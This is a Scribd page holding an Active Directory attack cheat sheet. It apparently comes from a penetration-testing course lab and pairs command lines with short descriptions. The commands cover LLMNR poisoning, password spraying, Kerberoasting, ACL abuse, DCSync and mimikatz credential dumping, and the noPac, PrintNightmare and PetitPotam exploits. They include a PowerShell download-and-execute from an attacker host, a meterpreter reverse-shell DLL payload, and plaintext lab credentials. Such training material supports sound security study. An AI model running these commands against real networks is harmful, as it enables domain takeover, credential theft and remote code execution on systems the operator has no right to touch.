Scribd
Upload
99 views12 pages

Cheatsheet - Active Directory Enum

Uploaded by

cgyounes5153
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
99 views12 pages

Cheatsheet - Active Directory Enum

Uploaded by

cgyounes5153
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

Cheatsheet - Active Directory Enum

Initial Enumeration
Command Description
nslookup ns1.inlanefreight.com Used to query the domain name system and discover the IP address to domain
name mapping of the target entered from a Linux-based host.
sudo tcpdump -i ens224 Used to start capturing network packets on the network interface proceeding the -
i option a Linux-based host.
sudo responder -I ens224 -A Used to start responding to & analyzing LLMNR , NBT-NS and MDNS queries on the
interface specified proceeding the -I option and operating in Passive
Analysis mode which is activated using -A . Performed from a Linux-based host
fping -asgq 172.16.5.0/23 Performs a ping sweep on the specified network segment from a Linux-based host.
sudo nmap -v -A -iL hosts.txt -oN Performs an nmap scan that with OS detection, version detection, script scanning,
/home/User/Documents/host-enum and traceroute enabled ( -A ) based on a list of hosts ( hosts.txt ) specified in the
file proceeding -iL . Then outputs the scan results to the file specified after the -
oN option. Performed from a Linux-based host
sudo git clone Uses git to clone the kerbrute tool from a Linux-based host.
https://github.com/ropnop/kerbrute.git
make help Used to list compiling options that are possible with make from a Linux-based host.
sudo make all Used to compile a Kerbrute binary for multiple OS platforms and CPU
architectures.
./kerbrute_linux_amd64 Used to test the chosen complied Kebrute binary from a Linux-based host.
sudo mv kerbrute_linux_amd64 Used to move the Kerbrute binary to a directory can be set to be in a Linux user's
/usr/local/bin/kerbrute path. Making it easier to use the tool.
./kerbrute_linux_amd64 userenum -d Runs the Kerbrute tool to discover usernames in the domain
INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o ( INLANEFREIGHT.LOCAL ) specified proceeding the -d option and the associated
kerb-results domain controller specified proceeding --dc using a wordlist and outputs ( -o ) the
results to a specified file. Performed from a Linux-based host.

LLMNR/NTB-NS Poisoning
Command Description
responder -h Used to display the usage instructions
and various options available
in Responder from a Linux-based host.
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt Uses hashcat to crack NTLMv2 ( -m )
hashes that were captured by responder
and saved in a file ( frond_ntlmv2 ). The
cracking is done based on a specified
wordlist.
Import-Module .\Inveigh.ps1 Using the Import-Module PowerShell
cmd-let to import the Windows-based
tool Inveigh.ps1 .
(Get-Command Invoke-Inveigh).Parameters Used to output many of the options &
functionality available with Invoke-
Inveigh . Peformed from a Windows-
based host.
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y Starts Inveigh on a Windows-based
host with LLMNR & NBNS spoofing
enabled and outputs the results to a file.
.\Inveigh.exe Starts the C# implementation
of Inveigh from a Windows-based host.
$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" Get- PowerShell script used to disable NBT-
ChildItem $regkey \|foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NS on a Windows host.
NetbiosOptions -Value 2 -Verbose}

Password Spraying & Password Policies


Command Description
#!/bin/bash for x in {{A..Z},{0..9}}{{A..Z},{0..9}} Bash script used to generate 16,079,616 possible username combinations
{{A..Z},{0..9}}{{A..Z},{0..9}} do echo $x; done from a Linux-based host.
crackmapexec smb 172.16.5.5 -u avazquez -p Uses CrackMapExec and valid credentials ( avazquez:Password123 ) to
Password123 --pass-pol enumerate the password policy ( --pass-pol ) from a Linux-based host.
rpcclient -U "" -N 172.16.5.5 Uses rpcclient to discover information about the domain through SMB
NULL sessions. Performed from a Linux-based host.
rpcclient $> querydominfo Uses rpcclient to enumerate the password policy in a target Windows domain
from a Linux-based host.
enum4linux -P 172.16.5.5 Uses enum4linux to enumerate the password policy ( -P ) in a target Windows
domain from a Linux-based host.
enum4linux-ng -P 172.16.5.5 -oA ilfreight Uses enum4linux-ng to enumerate the password policy ( -P ) in a target
Windows domain from a Linux-based host, then presents the output in YAML &
JSON saved in a file proceeding the -oA option.
ldapsearch -h 172.16.5.5 -x -b Uses ldapsearch to enumerate the password policy in a target Windows
"DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" \| grep -m 1 - domain from a Linux-based host.
B 10 pwdHistoryLength
net accounts Used to enumerate the password policy in a Windows domain from a Windows-
based host.
Import-Module .\PowerView.ps1 Uses the Import-Module cmd-let to import the PowerView.ps1 tool from a
Windows-based host.
Get-DomainPolicy Used to enumerate the password policy in a target Windows domain from a
Windows-based host.
enum4linux -U 172.16.5.5 \| grep "user:" \| cut -f2 - Uses enum4linux to discover user accounts in a target Windows domain, then
d"[" \| cut -f1 -d"]" leverages grep to filter the output to just display the user from a Linux-based
host.
rpcclient -U "" -N 172.16.5.5 rpcclient $> Uses rpcclient to discover user accounts in a target Windows domain from a
enumdomuser Linux-based host.
crackmapexec smb 172.16.5.5 --users Uses CrackMapExec to discover users ( --users ) in a target Windows domain
from a Linux-based host.
ldapsearch -h 172.16.5.5 -x -b Uses ldapsearch to discover users in a target Windows doman, then filters the
"DC=INLANEFREIGHT,DC=LOCAL" -s sub "(& output using grep to show only the sAMAccountName from a Linux-based host.
(objectclass=user))" \| grep sAMAccountName: \| cut -
f2 -d" "
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U Uses the python tool windapsearch.py to discover users in a target Windows
domain from a Linux-based host.
for u in $(cat valid_users.txt);do rpcclient -U Bash one-liner used to perform a password spraying attack
"$u%Welcome1" -c "getusername;quit" 172.16.5.5 \| using rpcclient and a list of users ( valid_users.txt ) from a Linux-based
grep Authority; done host. It also filters out failed attempts to make the output cleaner.
kerbrute passwordspray -d inlanefreight.local --dc Uses kerbrute and a list of users ( valid_users.txt ) to perform a password
172.16.5.5 valid_users.txt Welcome1 spraying attack against a target Windows domain from a Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt - Uses CrackMapExec and a list of users ( valid_users.txt ) to perform a
p Password123 \| grep + password spraying attack against a target Windows domain from a Linux-based
host. It also filters out logon failures using grep .
sudo crackmapexec smb 172.16.5.5 -u avazquez -p Uses CrackMapExec to validate a set of credentials from a Linux-based host.
Password123
sudo crackmapexec smb --local-auth 172.16.5.0/24 -u Uses CrackMapExec and the - -local-auth flag to ensure only one login
administrator -H 88ad09182de639ccc6579eb0849751cf \| attempt is performed from a Linux-based host. This is to ensure accounts are
grep + not locked out by enforced password policies. It also filters out logon failures
using grep .
Import-Module .\DomainPasswordSpray.ps1 Used to import the PowerShell-based tool DomainPasswordSpray.ps1 from a
Windows-based host.
Invoke-DomainPasswordSpray -Password Welcome1 - Performs a password spraying attack and outputs (-OutFile) the results to a
OutFile spray_success -ErrorAction SilentlyContinue specified file ( spray_success ) from a Windows-based host.

Enumerating Security Controls


Command Description
Get-MpComputerStatus PowerShell cmd-let used to check the status of Windows Defender Anti-
Virus from a Windows-based host.
Get-AppLockerPolicy -Effective \| select - PowerShell cmd-let used to view AppLocker policies from a Windows-based host.
ExpandProperty RuleCollections
Command Description
$ExecutionContext.SessionState.LanguageMode PowerShell script used to discover the PowerShell Language Mode being used
on a Windows-based host. Performed from a Windows-based host.
Find-LAPSDelegatedGroups A LAPSToolkit function that discovers LAPS Delegated Groups from a
Windows-based host.
Find-AdmPwdExtendedRights A LAPSTookit function that checks the rights on each computer with LAPS
enabled for any groups with read access and users with All Extended Rights .
Performed from a Windows-based host.
Get-LAPSComputers A LAPSToolkit function that searches for computers that have LAPS enabled,
discover password expiration and can discover randomized passwords.
Performed from a Windows-based host.

Credentialed Enumeration
Command Description
xfreerdp /u:[email protected] /p:Klmcargo2 Connects to a Windows target using valid credentials. Performed from a
/v:172.16.5.25 Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -- Authenticates with a Windows target over smb using valid credentials
users and attempts to discover more users ( --users ) in a target Windows
domain. Performed from a Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -- Authenticates with a Windows target over smb using valid credentials
groups and attempts to discover groups ( --groups ) in a target Windows
domain. Performed from a Linux-based host.
sudo crackmapexec smb 172.16.5.125 -u forend -p Klmcargo2 -- Authenticates with a Windows target over smb using valid credentials
loggedon-users and attempts to check for a list of logged on users ( --loggedon-users )
on the target Windows host. Performed from a Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -- Authenticates with a Windows target over smb using valid credentials
shares and attempts to discover any smb shares ( --shares ). Performed from a
Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M Authenticates with a Windows target over smb using valid credentials
spider_plus --share Dev-share and utilizes the CrackMapExec module ( -M ) spider_plus to go
through each readable share ( Dev-share ) and list all readable files. The
results are outputted in JSON . Performed from a Linux-based host.
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H Enumerates the target Windows domain using valid credentials and lists
172.16.5.5 shares & permissions available on each within the context of the valid
credentials used and the target Windows host ( -H ). Performed from a
Linux-based host.
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H Enumerates the target Windows domain using valid credentials and
172.16.5.5 -R SYSVOL --dir-only performs a recursive listing ( -R ) of the specified share ( SYSVOL ) and
only outputs a list of directories ( --dir-only ) in the share. Performed
from a Linux-based host.
rpcclient $> queryuser 0x457 Enumerates a target user account in a Windows domain using its
relative identifier ( 0x457 ). Performed from a Linux-based host.
rpcclient $> enumdomusers Discovers user accounts in a target Windows domain and their
associated relative identifiers ( rid ). Performed from a Linux-based host.
psexec.py Impacket tool used to connect to the CLI of a Windows target via
inlanefreight.local/wley:'transporter@4'@172.16.5.125 the ADMIN$ administrative share with valid credentials. Performed from
a Linux-based host.
wmiexec.py Impacket tool used to connect to the CLI of a Windows target
inlanefreight.local/wley:'transporter@4'@172.16.5.5 via WMI with valid credentials. Performed from a Linux-based host.
windapsearch.py -h Used to display the options and functionality of windapsearch.py.
Performed from a Linux-based host.
python3 windapsearch.py --dc-ip 172.16.5.5 -u Used to enumerate the domain admins group ( --da ) using a valid set of
inlanefreight\wley -p transporter@4 --da credentials on a target Windows domain. Performed from a Linux-based
host.
python3 windapsearch.py --dc-ip 172.16.5.5 -u Used to perform a recursive search ( -PU ) for users with nested
inlanefreight\wley -p transporter@4 -PU permissions using valid credentials. Performed from a Linux-based host.
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns Executes the python implementation of BloodHound ( bloodhound.py )
172.16.5.5 -d inlanefreight.local -c all with valid credentials and specifies a name server ( -ns ) and target
Windows domain ( inlanefreight.local ) as well as runs all checks ( -
c all ). Runs using valid credentials. Performed from a Linux-based
host.

Enumeration by Living Off the Land


Command Description
Get-Module PowerShell cmd-let used to list all available modules, their version and command
options from a Windows-based host.
Import-Module ActiveDirectory Loads the Active Directory PowerShell module from a Windows-based host.
Get-ADDomain PowerShell cmd-let used to gather Windows domain information from a Windows-
based host.
Get-ADUser -Filter {ServicePrincipalName -ne PowerShell cmd-let used to enumerate user accounts on a target Windows
"$null"} -Properties ServicePrincipalName domain and filter by ServicePrincipalName . Performed from a Windows-based
host.
Get-ADTrust -Filter * PowerShell cmd-let used to enumerate any trust relationships in a target Windows
domain and filters by any ( -Filter * ). Performed from a Windows-based host.
Get-ADGroup -Filter * \| select name PowerShell cmd-let used to enumerate groups in a target Windows domain and
filters by the name of the group ( select name ). Performed from a Windows-
based host.
Get-ADGroup -Identity "Backup Operators" PowerShell cmd-let used to search for a specifc group ( -Identity "Backup
Operators" ). Performed from a Windows-based host.
Get-ADGroupMember -Identity "Backup Operators" PowerShell cmd-let used to discover the members of a specific group ( -Identity
"Backup Operators" ). Performed from a Windows-based host.
Export-PowerViewCSV PowerView script used to append results to a CSV file. Performed from a
Windows-based host.
ConvertTo-SID PowerView script used to convert a User or Group name to it's SID . Performed
from a Windows-based host.
Get-DomainSPNTicket PowerView script used to request the kerberos ticket for a specified service
principal name ( SPN ). Performed from a Windows-based host.
Get-Domain PowerView script used tol return the AD object for the current (or specified)
domain. Performed from a Windows-based host.
Get-DomainController PowerView script used to return a list of the target domain controllers for the
specified target domain. Performed from a Windows-based host.
Get-DomainUser PowerView script used to return all users or specific user objects in AD.
Performed from a Windows-based host.
Get-DomainComputer PowerView script used to return all computers or specific computer objects in AD.
Performed from a Windows-based host.
Get-DomainGroup PowerView script used to eturn all groups or specific group objects in AD.
Performed from a Windows-based host.
Get-DomainOU PowerView script used to search for all or specific OU objects in AD. Performed
from a Windows-based host.
Find-InterestingDomainAcl PowerView script used to find object ACLs in the domain with modification rights
set to non-built in objects. Performed from a Windows-based host.
Get-DomainGroupMember PowerView script used to return the members of a specific domain group.
Performed from a Windows-based host.
Get-DomainFileServer PowerView script used to return a list of servers likely functioning as file servers.
Performed from a Windows-based host.
Get-DomainDFSShare PowerView script used to return a list of all distributed file systems for the current
(or specified) domain. Performed from a Windows-based host.
Get-DomainGPO PowerView script used to return all GPOs or specific GPO objects in AD.
Performed from a Windows-based host.
Get-DomainPolicy PowerView script used to return the default domain policy or the domain controller
policy for the current domain. Performed from a Windows-based host.
Get-NetLocalGroup PowerView script used to enumerate local groups on a local or remote machine.
Performed from a Windows-based host.
Get-NetLocalGroupMember PowerView script enumerate members of a specific local group. Performed from a
Windows-based host.
Get-NetShare PowerView script used to return a list of open shares on a local (or a remote)
machine. Performed from a Windows-based host.
Get-NetSession PowerView script used to return session information for the local (or a remote)
machine. Performed from a Windows-based host.
Test-AdminAccess PowerView script used to test if the current user has administrative access to the
local (or a remote) machine. Performed from a Windows-based host.
Find-DomainUserLocation PowerView script used to find machines where specific users are logged into.
Performed from a Windows-based host.
Find-DomainShare PowerView script used to find reachable shares on domain machines. Performed
from a Windows-based host.
Command Description
Find-InterestingDomainShareFile PowerView script that searches for files matching specific criteria on readable
shares in the domain. Performed from a Windows-based host.
Find-LocalAdminAccess PowerView script used to find machines on the local domain where the current
user has local administrator access Performed from a Windows-based host.
Get-DomainTrust PowerView script that returns domain trusts for the current domain or a specified
domain. Performed from a Windows-based host.
Get-ForestTrust PowerView script that returns all forest trusts for the current forest or a specified
forest. Performed from a Windows-based host.
Get-DomainForeignUser PowerView script that enumerates users who are in groups outside of the user's
domain. Performed from a Windows-based host.
Get-DomainForeignGroupMember PowerView script that enumerates groups with users outside of the group's
domain and returns each foreign member. Performed from a Windows-based host.
Get-DomainTrustMapping PowerView script that enumerates all trusts for current domain and any others
seen. Performed from a Windows-based host.
Get-DomainGroupMember -Identity "Domain Admins" - PowerView script used to list all the members of a target group ( "Domain
Recurse Admins" ) through the use of the recurse option ( -Recurse ). Performed from a
Windows-based host.
Get-DomainUser -SPN -Properties PowerView script used to find users on the target Windows domain that have
samaccountname,ServicePrincipalName the Service Principal Name set. Performed from a Windows-based host.
.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data Runs a tool called Snaffler against a target Windows domain that finds various
kinds of data in shares that the compromised account has access to. Performed
from a Windows-based host.

Transfering Files
Command Description
sudo python3 -m http.server 8001 Starts a python web server for quick hosting
of files. Performed from a Linux-basd host.
"IEX(New-Object PowerShell one-liner used to download a file
Net.WebClient).downloadString('http://172.16.5.222/SharpHound.exe')" from a web server. Performed from a
Windows-based host.
impacket-smbserver -ip 172.16.5.x -smb2support -username user -password password Starts a impacket SMB server for quick
shared /home/administrator/Downloads/ hosting of a file. Performed from a Windows-
based host.

Kerberoasting
Command Description
sudo python3 -m pip install . Used to install Impacket from inside the directory that
gets cloned to the attack host. Performed from a Linux-
based host.
GetUserSPNs.py -h Impacket tool used to display the options and
functionality of GetUserSPNs.py from a Linux-based
host.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday Impacket tool used to get a list of SPNs on the target
Windows domain from a Linux-based host.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request Impacket tool used to download/request ( -request )
all TGS tickets for offline processing from a Linux-
based host.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request- Impacket tool used to download/request ( -request-
user sqldev user ) a TGS ticket for a specific user account
( sqldev ) from a Linux-based host.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request- Impacket tool used to download/request a TGS ticket
user sqldev -outputfile sqldev_tgs for a specific user account and write the ticket to a file
( -outputfile sqldev_tgs ) linux-based host.
hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt --force Attempts to crack the Kerberos ( -m 13100 ) ticket hash
( sqldev_tgs ) using hashcat and a wordlist
( rockyou.txt ) from a Linux-based host.
setspn.exe -Q */* Used to enumerate SPNs in a target Windows domain
from a Windows-based host.
Add-Type -AssemblyName System.IdentityModel New-Object PowerShell script used to download/request the TGS
System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList ticket of a specific user from a Windows-based host.
Command Description
"MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* \| Select-String '^CN' -Context Used to download/request all TGS tickets from a
0,1 \| % { New-Object WIndows-based host.
System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList
$_.Context.PostContext[0].Trim() }
mimikatz # base64 /out:true Mimikatz command that ensures TGS tickets are
extracted in base64 format from a Windows-based
host.
kerberos::list /export Mimikatz command used to extract the TGS tickets
from a Windows-based host.
echo "<base64 blob>" \| tr -d \\n Used to prepare the base64 formatted TGS ticket for
cracking from Linux-based host.
cat encoded_file \| base64 -d > sqldev.kirbi Used to output a file ( encoded_file ) into a .kirbi file in
base64 ( base64 -d > sqldev.kirbi ) format from a
Linux-based host.
python2.7 kirbi2john.py sqldev.kirbi Used to extract the Kerberos ticket . This also
creates a file called crack_file from a Linux-based
host.
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > Used to modify the crack_file for Hashcat from a
sqldev_tgs_hashcat Linux-based host.
cat sqldev_tgs_hashcat Used to view the prepared hash from a Linux-based
host.
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt Used to crack the prepared Kerberos ticket hash
( sqldev_tgs_hashcat ) using a wordlist
( rockyou.txt ) from a Linux-based host.
Import-Module .\PowerView.ps1 Get-DomainUser * -spn \| select Uses PowerView tool to extract TGS Tickets .
samaccountname Performed from a Windows-based host.
Get-DomainUser -Identity sqldev \| Get-DomainSPNTicket -Format Hashcat PowerView tool used to download/request the TGS
ticket of a specific ticket and automatically format it
for Hashcat from a Windows-based host.
Get-DomainUser * -SPN \| Get-DomainSPNTicket -Format Hashcat \| Export-Csv Exports all TGS tickets to a .CSV file
.\ilfreight_tgs.csv -NoTypeInformation ( ilfreight_tgs.csv ) from a Windows-based host.
cat .\ilfreight_tgs.csv Used to view the contents of the .csv file from a
Windows-based host.
.\Rubeus.exe Used to view the options and functionality possible
with the tool Rubeus . Performed from a Windows-
based host.
.\Rubeus.exe kerberoast /stats Used to check the kerberoast stats ( /stats ) within
the target Windows domain from a Windows-based
host.
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap Used to request/download TGS tickets for accounts
with the admin count set to 1 then formats the output
in an easy to view & crack manner ( /nowrap ) .
Performed from a Windows-based host.
.\Rubeus.exe kerberoast /user:testspn /nowrap Used to request/download a TGS ticket for a specific
user ( /user:testspn ) the formats the output in an
easy to view & crack manner ( /nowrap ). Performed
from a Windows-based host.
Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds- PowerView tool used to check the msDS-
supportedencryptiontypes SupportedEncryptionType attribute associated with a
specific user account ( testspn ). Performed from a
Windows-based host.
hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt Used to attempt to crack the ticket hash using a
wordlist ( rockyou.txt ) from a Linux-based host .

ACL Enumeration & Tactics


Command Description
Find-InterestingDomainAcl PowerView tool used to find object ACLs in the
target Windows domain with modification rights
set to non-built in objects from a Windows-based
host.
Import-Module .\PowerView.ps1 $sid = Convert-NameToSid wley Used to import PowerView and retrieve
the SID of a specific user account ( wley ) from a
Command Description
Windows-based host.
Get-DomainObjectACL -Identity * \| ? {$_.SecurityIdentifier -eq $sid} Used to find all Windows domain objects that the
user has rights over by mapping the user's SID to
the SecurityIdentifier property from a
Windows-based host.
$guid= "00299570-246d-11d0-a768-00aa006e0529" Get-ADObject -SearchBase Used to perform a reverse search & map to
"CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter a GUID value from a Windows-based host.
{ObjectClass -like 'ControlAccessRight'} -Properties * \| Select
Name,DisplayName,DistinguishedName,rightsGuid \| ?{$_.rightsGuid -eq $guid} \|
fl
Get-DomainObjectACL -ResolveGUIDs -Identity * \| ? {$_.SecurityIdentifier -eq Used to discover a domain object's ACL by
$sid} performing a search based on GUID's ( -
ResolveGUIDs ) from a Windows-based host.
Get-ADUser -Filter * \| Select-Object -ExpandProperty SamAccountName > Used to discover a group of user accounts in a
ad_users.txt target Windows domain and add the output to a
text file ( ad_users.txt ) from a Windows-based
host.
foreach($line in [System.IO.File]::ReadLines("C:\Users\htb- A foreach loop used to retrieve ACL information
student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" \| Select- for each domain user in a target Windows domain
Object Path -ExpandProperty Access \| Where-Object {$_.IdentityReference -match by feeding each list of a text file( ad_users.txt )
'INLANEFREIGHT\\wley'}} to the Get-ADUser cmdlet, then enumerates
access rights of those users. Performed from a
Windows-based host.
$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force Used to create a PSCredential Object from a
$Cred = New-Object Windows-based host.
System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText - Used to create a SecureString Object from a
Force Windows-based host.
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword - PowerView tool used to change the password of a
Credential $Cred -Verbose specifc user ( damundsen ) on a target Windows
domain from a Windows-based host.
Get-ADGroup -Identity "Help Desk Level 1" -Properties * \| Select - PowerView tool used view the members of a
ExpandProperty Members target security group ( Help Desk Level 1 ) from
a Windows-based host.
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' - PowerView tool used to add a specifc user
Credential $Cred2 -Verbose ( damundsen ) to a specific security group ( Help
Desk Level 1 ) in a target Windows domain from
a Windows-based host.
Get-DomainGroupMember -Identity "Help Desk Level 1" \| Select MemberName PowerView tool used to view the members of a
specific security group ( Help Desk Level 1 ) and
output only the username of each member
( Select MemberName ) of the group from a
Windows-based host.
Set-DomainObject -Credential $Cred2 -Identity adunn -SET PowerView tool used create a fake Service
@{serviceprincipalname='notahacker/LEGIT'} -Verbose Principal Name given a sepecift user ( adunn )
from a Windows-based host.
Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname PowerView tool used to remove the fake Service
-Verbose Principal Name created during the attack from a
Windows-based host.
Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' - PowerView tool used to remove a specific user
Credential $Cred2 -Verbose ( damundsent ) from a specific security group
( Help Desk Level 1 ) from a Windows-based
host.
ConvertFrom-SddlString PowerShell cmd-let used to covert an SDDL
string into a readable format. Performed from a
Windows-based host.

DCSync
Command Description
Get-DomainUser -Identity adunn \| select PowerView tool used to view the group
samaccountname,objectsid,memberof,useraccountcontrol \|fl membership of a specific user ( adunn ) in a
target Windows domain. Performed from a
Windows-based host.
Command Description
$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164" Get-ObjectAcl Used to create a variable called SID that is set
"DC=inlanefreight,DC=local" -ResolveGUIDs \| ? { ($_.ObjectAceType -match equal to the SID of a user account. Then uses
'Replication-Get')} \| ?{$_.SecurityIdentifier -match $sid} \| select PowerView tool Get-ObjectAcl to check a
AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType \| specific user's replication rights. Performed
fl from a Windows-based host.
secretsdump.py -outputfile inlanefreight_hashes -just-dc Impacket tool sed to extract NTLM hashes from
INLANEFREIGHT/[email protected] -use-vss the NTDS.dit file hosted on a target Domain
Controller ( 172.16.5.5 ) and save the
extracted hashes to an file
( inlanefreight_hashes ). Performed from a
Linux-based host.
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL Uses Mimikatz to perform a dcsync attack
/user:INLANEFREIGHT\administrator from a Windows-based host.

Privileged Access
Command Description
Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 - PowerView based tool to used to enumerate the Remote Desktop
GroupName "Remote Desktop Users" Users group on a Windows target ( -ComputerName ACADEMY-EA-MS01 )
from a Windows-based host.
Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 - PowerView based tool to used to enumerate the Remote Management
GroupName "Remote Management Users" Users group on a Windows target ( -ComputerName ACADEMY-EA-MS01 )
from a Windows-based host.
$password = ConvertTo-SecureString "Klmcargo2" - Creates a variable ( $password ) set equal to the password ( Klmcargo2 )
AsPlainText -Force of a user from a Windows-based host.
$cred = new-object Creates a variable ( $cred ) set equal to the username ( forend ) and
System.Management.Automation.PSCredential password ( $password ) of a target domain account from a Windows-
("INLANEFREIGHT\forend", $password) based host.
Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential Uses the PowerShell cmd-let Enter-PSSession to establish a
$cred PowerShell session with a target over the network ( -ComputerName
ACADEMY-EA-DB01 ) from a Windows-based host. Authenticates using
credentials made in the 2 commands shown prior ( $cred & $password ).
evil-winrm -i 10.129.201.234 -u forend Used to establish a PowerShell session with a Windows target from a
Linux-based host using WinRM .
Import-Module .\PowerUpSQL.ps1 Used to import the PowerUpSQL tool.
Get-SQLInstanceDomain PowerUpSQL tool used to enumerate SQL server instances from a
Windows-based host.
Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" - PowerUpSQL tool used to connect to connect to a SQL server and query
username "inlanefreight\damundsen" -password "SQL1234!" - the version ( -query 'Select @@version' ) from a Windows-based host.
query 'Select @@version'
mssqlclient.py Impacket tool used to display the functionality and options provided
with mssqlclient.py from a Linux-based host.
mssqlclient.py INLANEFREIGHT/[email protected] - Impacket tool used to connect to a MSSQL server from a Linux-based
windows-auth host.
SQL> help Used to display mssqlclient.py options once connected to a MSSQL
server.
SQL> enable_xp_cmdshell Used to enable xp_cmdshell stored procedure that allows for
executing OS commands via the database from a Linux-based host.
xp_cmdshell whoami /priv Used to enumerate rights on a system using xp_cmdshell .

NoPac
Command Description
sudo git clone https://github.com/Ridter/noPac.git Used to clone a noPac exploit using git. Performed from a Linux-
based host.
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc- Runs scanner.py to check if a target system is vulnerable
ip 172.16.5.5 -use-ldap to noPac / Sam_The_Admin from a Linux-based host.
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip Used to exploit the noPac / Sam_The_Admin vulnerability and gain
172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate a SYSTEM shell ( -shell ). Performed from a Linux-based host.
administrator -use-ldap
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip Used to exploit the noPac / Sam_The_Admin vulnerability and
172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator - perform a DCSync attack against the built-in Administrator
Command Description
use-ldap -dump -just-dc-user INLANEFREIGHT/administrator account on a Domain Controller from a Linux-based host.

PrintNightmare
Command Description
git clone https://github.com/cube0x0/CVE-2021-1675.git Used to clone a PrintNightmare exploit using git from a Linux-based
host.
pip3 uninstall impacket git clone Used to ensure the exploit author's ( cube0x0 ) version of Impacket is
https://github.com/cube0x0/impacket cd impacket python3 installed. This also uninstalls any previous Impacket version on a Linux-
./setup.py install based host.
rpcdump.py @172.16.5.5 \| egrep 'MS-RPRN\|MS-PAR' Used to check if a Windows target has MS-PAR & MSRPRN exposed
from a Linux-based host.
msfvenom -p windows/x64/meterpreter/reverse_tcp Used to generate a DLL payload to be used by the exploit to gain a
LHOST=10.129.202.111 LPORT=8080 -f dll > backupscript.dll shell session. Performed from a Windows-based host.
sudo smbserver.py -smb2support CompData Used to create an SMB server and host a shared folder ( CompData ) at
/path/to/backupscript.dll the specified location on the local linux host. This can be used to host
the DLL payload that the exploit will attempt to download to the host.
Performed from a Linux-based host.
sudo python3 CVE-2021-1675.py inlanefreight.local/<username>: Executes the exploit and specifies the location of the DLL payload.
<password>@172.16.5.5 Performed from a Linux-based host.
'\\10.129.202.111\CompData\backupscript.dll'

PetitPotam
Command Description
sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA- Impacket tool used to create an NTLM relay by
CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template specifiying the web enrollment URL for
DomainController the Certificate Authority host. Perfomred
from a Linux-based host.
git clone https://github.com/topotam/PetitPotam.git Used to clone the PetitPotam exploit using git.
Performed from a Linux-based host.
python3 PetitPotam.py 172.16.5.225 172.16.5.5 Used to execute the PetitPotam exploit by
specifying the IP address of the attack host
( 172.16.5.255 ) and the target Domain Controller
( 172.16.5.5 ). Performed from a Linux-based host.
